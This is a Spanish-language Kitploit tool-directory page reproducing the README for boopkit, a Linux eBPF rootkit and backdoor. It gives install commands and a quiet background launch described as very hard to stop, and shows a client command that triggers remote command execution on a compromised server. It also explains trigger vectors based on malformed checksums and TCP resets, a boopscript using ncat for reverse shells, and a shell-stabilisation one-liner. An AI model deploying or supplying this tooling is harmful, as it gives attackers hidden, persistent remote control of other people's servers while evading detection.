Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
boopkit — Backdoor de Linux eBPF sobre TCP. Genera shells inversas, RCE, con acceso privilegiado previo. Menos Honkin, Más Tonkin. | Kitploit
Herramientas/GitHubGitHub/krisnova/boopkit
Escalada de PrivilegiosGeneración de PayloadsExplotaciónEvasión de IDS/IPSPost-ExplotaciónPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso Remoto
GitHubkrisnova/boopkit

boopkit

Backdoor de Linux eBPF sobre TCP. Genera shells inversas, RCE, con acceso privilegiado previo. Menos Honkin, Más Tonkin.

1.7k183hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

================================================================

root@kitploit:~
██████╗  ██████╗  ██████╗ ██████╗ ██╗  ██╗██╗████████╗
██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗██║ ██╔╝██║╚══██╔══╝
██████╔╝██║   ██║██║   ██║██████╔╝█████╔╝ ██║   ██║   
██╔══██╗██║   ██║██║   ██║██╔═══╝ ██╔═██╗ ██║   ██║   
██████╔╝╚██████╔╝╚██████╔╝██║     ██║  ██╗██║   ██║   
╚═════╝  ╚═════╝  ╚═════╝ ╚═╝     ╚═╝  ╚═╝╚═╝   ╚═╝   
Autor: Kris Nóva <[email protected]> Versión 1.4.0

EN NINGÚN CASO EL TITULAR DE LOS DERECHOS DE AUTOR O LOS COLABORADORES SERÁN
RESPONSABLES POR DAÑOS DIRECTOS, INDIRECTOS, INCIDENTALES, ESPECIALES,
EJEMPLARES O CONSECUENTES.    

NO INTENTE UTILIZAR LAS HERRAMIENTAS PARA VIOLAR LA LEY.
EL AUTOR NO ES RESPONSABLE DE NINGUNA ACCIÓN ILEGAL.
EL USO INDEBIDO DEL SOFTWARE, LA INFORMACIÓN O EL CÓDIGO FUENTE
PUEDE DAR LUGAR A CARGOS PENALES.

Úselo bajo su propio riesgo.

================================================================

Boopkit. Rootkit y puerta trasera para Linux. Construido usando eBPF.

Uso: boopkit [opciones]

Opciones: -h, help Muestra la ayuda y el uso de boopkit. -i, interface Nombre de la interfaz. lo, eth0, wlan0, etc. -s, sudo-bypass Omite la verificación de sudo. Rompe la ofuscación de PID. -r, reverse-conn Intenta una búsqueda inversa de RCE si no se encuentra un payload. -q, quiet Desactiva la salida. -x, reject Direcciones de origen para rechazar disparadores.

root@kitploit:~

Herramientas de puerta trasera, rootkit y evasión de eBPF para Linux.
Ejecución remota de comandos sobre TCP sin procesar.

 - Probado en kernel Linux 5.16
 - Probado en kernel Linux 5.17
 - Ejecución remota de código sobre TCP (SSH, Nginx, Kubernetes, etc.)
 - Evasión de puerta de enlace de red (checksums incorrectos, restablecimiento TCP)
 - Auto-ofuscación en tiempo de ejecución (ocultación de procesos eBPF)

##### Aviso legal

> ¡Esto **NO** es un exploit! ¡Requiere acceso privilegiado previo a un servidor para funcionar!
> Soy un investigador de seguridad profesional. Estas son herramientas de sombrero blanco utilizadas únicamente con fines de investigación.
> Úselo de manera responsable. Nunca use este software de forma ilegal.

![FSpgEXTacAYme8t](https://assets.kitploit.com/production/public/readmes/6564/0548305eb4df169ef0eec55803444ea87ef6b713ae30b8cd8514618f19750f70.jpg)

## Lado del Servidor

Descargue y compile boopkit.

```bash
wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz
tar -xzf v1.3.0.tar.gz 
cd boopkit-1.3.0/
make
sudo make install

Ejecute boopkit en primer plano.

root@kitploit:~
# Rechazar todos los boops en localhost y 10.0.0.1
boopkit -x 127.0.0.1 -x 10.0.0.1

Ejecute boopkit en segundo plano en modo silencioso.

root@kitploit:~
# ¡Peligro! ¡Esto puede ser MUY difícil de detener! ¡Ejecútelo bajo su propio riesgo!
boopkit -q &

Boopkit ahora está en ejecución y puede ser explotado mediante la herramienta de línea de comandos cliente boopkit-boop.

Lado del Cliente

Descargue y compile boopkit.

root@kitploit:~
wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz
tar -xzf v1.2.0.tar.gz 
cd boopkit-1.2.0/
make
sudo make install

Ejecute boopkit-boop contra el servidor.

root@kitploit:~
# ===================
RCE="ls -la"
# ===================
LHOST="127.0.0.1"
LPORT="3535"
RHOST="127.0.0.1"
RPORT="22"
boopkit-boop \
  -lhost $LHOST \
  -lport $LPORT \
  -rhost $RHOST \
  -rport $RPORT \
  -c "$RCE"

Vectores de Boop

Boopkit responderá a varios eventos en la red. Ambos pueden ser activados con la herramienta boopkit-boop.

Formato del encabezado TCP. Tomado de RFC 793. Septiembre de 1981.

root@kitploit:~
        0                   1                   2                   3
        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |          Source Port          |       Destination Port        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                        Sequence Number                        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                    Acknowledgment Number                      |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |  Data |           |U|A|P|R|S|F|                               |
       | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
       |       |           |G|K|H|T|N|N|                               |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |           Checksum            |         Urgent Pointer        |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       |                    Options                    |    Padding    |
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
       {                             data                              }
       {                             ....                              }
       {                             data                              }
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

1. Checksum incorrecto

Primero, la herramienta boopkit-boop enviará un paquete TCP SYN malformado con un checksum vacío al servidor a través de un socket SOCK_RAW. Esto activará boopkit de forma remota independientemente de los servicios TCP en ejecución. Funciona contra cualquier servidor Linux que ejecute boopkit, sin importar el estado de los servicios TCP.

Use -p con boopkit-boop para usar solo este primer vector.

⚠️ ¡Algunos hardware de red modernos descartarán todos los paquetes con checksum malformado, como el necesario para explotar boopkit usando este vector!

2. Envío de paquete ACK-RST

A continuación, la herramienta boopkit-boop completará un handshake TCP válido con un socket SOCK_STREAM contra un servicio TCP remoto, como SSH, Kubernetes, Nginx, etc. Una vez completado el handshake TCP inicial, boopkit-boop repetirá el proceso por segunda vez. El segundo handshake invertirá el indicador de restablecimiento TCP en el paquete, provocando un restablecimiento TCP en el servidor.

Cualquiera de estas tácticas es suficiente para activar boopkit de forma independiente. Diversas condiciones de hardware de red y tiempo de ejecución harán que una u otra táctica sea más viable. Boopkit intentará ambas y responderá a ambas por defecto.

Boopscript

El archivo boopscript es un script compatible con Metasploit que se puede usar para activar remotamente la puerta trasera de boopkit después de que boopkit-boop esté instalado en una máquina Linux remota.

root@kitploit:~
# boopscript
RHOST="127.0.0.1"
RPORT="22"
LHOST="127.0.0.1"
LPORT="3535"

NCAT="/usr/bin/ncat"
NCATLISTENPORT="3545"

Dependencias de compilación

  • 'clang'
  • 'bpftool' Requerido para libbpf
  • 'xdp-tools' Requerido para libxdp
  • 'llvm'
  • 'pcap'
  • 'lib32-glibc'

Estabilización de shell inversa

root@kitploit:~
python -c "import pty; pty.spawn('/bin/bash')"

Referencias

  • Tracepoints con BPF
  • Sockets TCP sin procesar
  • Mal BPF

Créditos a los autores originales por sus útiles ejemplos de código. ¡Tomé prestado mucho código para este proyecto!

Descargar herramienta